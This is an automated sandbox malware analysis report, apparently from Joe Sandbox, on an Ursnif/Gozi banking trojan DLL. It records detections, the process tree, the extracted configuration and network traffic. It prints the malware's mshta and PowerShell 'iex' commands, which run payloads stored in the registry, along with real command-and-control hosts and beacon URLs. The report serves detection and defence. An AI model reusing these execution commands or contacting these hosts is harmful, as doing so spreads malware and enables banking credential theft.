Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.BScope.TrojanBanker.IcedID.13045

Overview

General Information

Sample Name:SecuriteInfo.com.BScope.TrojanBanker.IcedID.13045 (renamed file extension from 13045 to dll)
Analysis ID:355490
MD5:a98649743626d197b440755061b1aac3
SHA1:8033ebd201645f713fb4ad48bf92e5da26bc8216
SHA256:f30b3f53f613d953680fdde8faf35c96a25a1136d0dd6c7aab1cc14ee908702c
Tags:Gozi

Most interesting Screenshot:

Detection

Gozi Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 4220 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll' MD5: D1A7945F1810E6534B75E9E2B7D62633)
    • rundll32.exe (PID: 4880 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 3412 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 1260 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6432 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 412 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 576 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 2428 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3888 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6024 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6552 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1E30.tmp' 'c:\Users\user\AppData\Local\Temp\vy454zdn\CSCE57ED4738764ED181FB6CF8C395867D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6272 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6300 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES310C.tmp' 'c:\Users\user\AppData\Local\Temp\vkjmiujf\CSC5E84712ED974B8AAC9F3D817F74BE40.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "181", "system": "8c34453f67a8cfe0dea5c01f31a0c919hh-", "size": "202820", "crc": "2", "action": "00000000", "id": "2200", "time": "1613790327", "user": "f73be0088695dc15e71ab15cc8e7488a", "hash": "0xf751eb91", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmpGoziRuleWin32.GoziCCN-CERT
    • 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
    00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          Click to see the 18 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2428, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 3888

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://c56.lepini.at/jvassets/xI/t64.datingsAvira URL Cloud: Label: phishing
          Found malware configurationShow sources
          Source: rundll32.exe.4880.1.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "181", "system": "8c34453f67a8cfe0dea5c01f31a0c919hh-", "size": "202820", "crc": "2", "action": "00000000", "id": "2200", "time": "1613790327", "user": "f73be0088695dc15e71ab15cc8e7488a", "hash": "0xf751eb91", "soft": "3"}
          Multi AV Scanner detection for domain / URLShow sources
          Source: c56.lepini.atVirustotal: Detection: 8%Perma Link
          Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
          Source: api10.laptok.atVirustotal: Detection: 10%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dllVirustotal: Detection: 21%Perma Link

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000020.00000002.440174527.0000025637660000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.449830180.000002835CB50000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
          Source: Binary string: c:\FatSchool\syllableLetter\HuntMouth\ResultMount\Metal.pdb source: loaddll32.exe, 00000000.00000002.474041669.000000006E4F4000.00000002.00020000.sdmp, SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll
          Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
          Source: Binary string: rundll32.pdb source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
          Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_032E3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_032E3512
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06004CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,1_2_06004CF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06015518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_06015518
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_0600834C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_0600B88D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,1_2_060016E1
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
          Source: global trafficHTTP traffic detected: GET /api1/lRuXDeqB_2Bc/XvlsjNkb12o/gwuZFBZ1reBnRN/MwDD30RutxcHLukN9rpn9/npm0S1bymAWDLwAq/sSrh6nrcB30L_2F/izKhwPXgoMPbDw8AwI/bcxbPx_2F/sPE_2F9KStlAhqTF4V5b/y4C6N5Yt6P6BPPOxWQU/OGLJLzSobh_2B0sjZCp_2F/DrvPoP9aSd0Pf/rb0_2BEP/NEaBXrAH5a59GVRi35npZ2u/2HVSB5mOu5/GjNc1aS2g_2Friv0u/PdviQBpuxewp/654QJEVjE1l/tqM_2FQyyccPpl/OvxU5bjYeNf_2FSFZWNT_/2BXxJQTeWkl/B26Z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/52JoIUxZl8uL8g/Jlv9SsgDyw540Wq6LwGS5/Akl7wfo7sQpZNdRY/cjXr0_2FffzKq5M/LLRxJgTq1LatxpQ4rq/e_2Fc6vld/dlUg3_2FZQ0ehGT4So8G/fMy2GT6nt6deO5e25_2/Ff0JiPPfiqmM34f5OWLQvg/KYp9KrJh0r67L/pn5QNIOf/kMWRvPMFc9r9kXODRg1ulU2/z7odHXGBMR/lYfmaULcgNQgPx4am/cS2bXQrCZF_2/B23CtBYMqES/4DTxnAolsdVLPO/ddtMaT_2FHc7z3PMSjVwg/UA6RKmWTWJJFW3tn/HIFqSc0CgE9Oz8U/RMsU3xQiPj/0lNR7s2U HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6OmN/wh_2Fqsq0x_2BVcyRu/hKNYQUf5c/2_2FFXvnTSY3WFoMID9n/_2F6Bbwi_2B4k052_2B/Wr5N3KWbYMdVd6GR_2BEd6/frQD5QyUG4NTH/KCXhDtaI/LQzs7_2BhqKT7yFro_2FbyT/VIlUFlqLO5/zPoVUlcpnwFahHZhS/NgHMqvKCx6Md/QpmRmASOulk/3KXyMSMLXtwHJ0/Ayj0bGv0dcW2jNr68db4N/OxsA4fzXWiBGnk2x/RKSr4_2F7Vbgdhx/3Qe5dCnv674qW96yc4/mbzhfuMNA/DIB HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/KdItNYP92K_2BGFJRG/FCes9fXP6/EKH8rknsTZpgqZdJldqw/3b9dm14MUM_2B8EMGSI/7pfw2RywZcbIKG9NkPZ6rU/L_2F1iZVmuA8I/bZCf7wPT/59CIAbsuvFsGBr_2ByvNsJY/_2F8CnY_2F/Qz4L32M090vQj6JXa/h6No_2BwGiDr/i_2BcbOUuIA/99cCf3a5n6QYR9/qLuOWT5N_2FpMeyoZyiR_/2BPh75eFbRwqS7wb/9mmFbiL_2BjLH_2/Bw0aMox3zZYN8BrWji/d0ul9u66b/5Ar2TaNyvuxbIv_2FbJO/iZdpEvv6dL67JT4JuHG/CIG3_2B0w/ezBI HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/vWkJGuJE0Ypz4ELElXNYpx/ievwRvWRp6AtE/FLqmCUzt/5uo9iTuyNQHW_2Bgl72Mtoc/OJjks7D84c/jUQzCvj9HAvA4_2Fn/0IgtjZWkkpM9/mugU4KqOZpX/ELHTOesIuFyu2R/fPF1D_2FKLK8pIgLUPJ8b/MsAkkR2vVU550mz4/2xNIT9yeFYP0SH8/QCAO7xgxjSKhjDwWSu/d4RDhkHVo/swuiJsofHs6pC25dK6l3/HzIzoU7jbR0_2FxK9PH/dXkkvhT3hIXDJCOq2yuAle/hm5AJy_2FYrqX/EHbCXHlP/QMEn6CeIiMAtfbE_2BItId6/8cRyHuVByX/s_2FZEQQg/t HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/Nwf1NrCXPxFirOr0/uMxCmKw0yJ8Me4y/orydykHO8XvuJC2OYB/s7Uq9EcWB/rEU1Bs_2FE38t41ILq_2/BLnFpSQmWR07RbE9l3_/2F7qFMxOvjfOZ3Wk5kh8d_/2FSq1zGohLPY7/rV1YYz1u/bg5hb76H1d9lPRJ2QkA7rOK/CzjsM_2Bpl/4Tr8l66uq_2F0z5aY/B6OoutaRjYCr/vft5NoB1Vtt/gZ1VtWrzMHi7Qd/_2FJa1O_2B51q_2Fi9e0F/9zlCZ_2Fg1KAymcn/ZnA4yi7CxnTLTPI/Xusdx3Oaio4z6sFjkd/Hl0nRXuIj/kLcz6KJ9ikRLyD1DMiLc/55hUFdugyYd/ehM HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/b_2BsRZ0V3/9XA_2FQDJiqIrvxT_/2Bzr5nCmqGSK/ShqTR3djQTg/9okoIzbrA45DgN/9_2BnAmX4aa3sOT_2Fjtg/wGfQ9GmpK7SG_2FZ/Jm_2Bu2uDtvBBiy/YdPpa1IDFr0YVFiCIU/9kpIGh2av/Hp7TJNKAwdyzbdIX2lq0/_2FLAYbWp0p17KILF16/gSpFWzNIu2P1GhKVwKLBMS/JBNwDitSRAHK2/4FJoV5D8/N70d4vmik_2BJY6NS2Abb4g/od_2FcoJz_/2BCjrYc2TYSJ6kyyC/h8EY_2Bk0tWz/YrJjDZ2_2Bq/x6uK3S6lfJQGsn/0gdeblP7aJv/qe HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/MAC288CXvx/CqE_2FjFttZgFxzTr/MiARq1YU3Ozj/cO5nvYd1QZ1/9pP5tjMqhWzKxQ/4Fo_2FlvUMfZR_2B6lME7/5rcSbRaprs2L63pj/ODg2Z6FLC7qglee/4_2Fk4pRcK6CoYb5H6/4ED5a34fC/FOE8o4kQepcFxnvsdyvs/5oUTPwL2esoyhQYMEtl/0473GEiPK1QvkIo4bwkLYq/JhStBUtEP6iki/nGPvtQkv/kuGeGooyGp9BZWCtnT06knF/ZgoZr_2F5L/6SdySCav5X7udnSBS/_2F_2B8xtq_2/BGO6I65Acz9/Ko7NuIbnR/Immw_2BnO/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/QsdQ9bwnxSOH1/x55zfc3o/j8BfIHUCdwyUtYZFgBqFl8X/_2BFwtf_2F/QdLOKZB9TNZsN7wvI/vobkXML_2B8c/sYZxphtC1aK/FLvOclZiXjQYOG/x5IaE7pOnih7q_2BrqmEb/egNoiSna00Kb6meB/wCzvKPOaVph51X8/xUkuRKEycofy4z_2Bl/5ilyf6ti8/f3G6tY3BMx_2BC48fFfc/OMRrOfQP_2FoyZv3x5c/mBeNmAfD4fjZh3wiudEAuV/MfCWeHQQB11zh/ND3yzaR1/SNDEufrq_2FC3x6B7XUhRUl/mw4VFuO8kI0ykyRa6MM/y41I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: unknownDNS traffic detected: queries for: api10.laptok.at
          Source: unknownHTTP traffic detected: POST /api1/7l8Dzjsp1/mXsJaM5_2F8Vehw_2BWy/W2IjJ85rxt75hrAokHG/TJ0QxGdBxL3u8DIp94_2BF/9KwvYHm_2BYSs/BfajRvyD/2MOW_2BQiedgr_2Fd8hxOAg/4ITYhYiB2o/YxcRWa76OaPgbHiid/oLaZ6rVxKHz9/_2B0DP9hiSI/LwZPk_2FktvyHp/45tIfIOgi7g5V2ypH5k4K/BaUY8Ny1I4ubY51x/HVluRDHgx9QZrYK/A8s3_2BcDuftJ4p3cS/pxjey9cHz/IRMztldXNqbinunnNW7T/V01D57bubow_2FdlHkl/Kzth8j0U_2FloaabiqRg_2/B_2Bb2W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 19 Feb 2021 18:05:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
          Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: {785970B2-7328-11EB-90E4-ECF4BB862DED}.dat.21.drString found in binary or memory: http://api10.laptok.at/api1/52JoIUxZl8uL8g/Jlv9SsgDyw540Wq6LwGS5/Akl7wfo7sQpZNdRY/cjXr0_2FffzKq5M/LL
          Source: {785970B0-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DF4A349C0270E318E7.TMP.21.drString found in binary or memory: http://api10.laptok.at/api1/lRuXDeqB_2Bc/XvlsjNkb12o/gwuZFBZ1reBnRN/MwDD30RutxcHLukN9rpn9/npm0S1bymA
          Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6O
          Source: {785970B4-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DFB35D4E79E851C9A1.TMP.21.drString found in binary or memory: http://api10.laptok.at/api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6OmN/wh
          Source: explorer.exe, 00000024.00000002.504777682.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/vWkJGuJE0Ypz4ELElXNYpx/ievwRvWRp6AtE/FLqmCUzt/5uo9iTuyNQHW_2Bgl72Mtoc/OJ
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
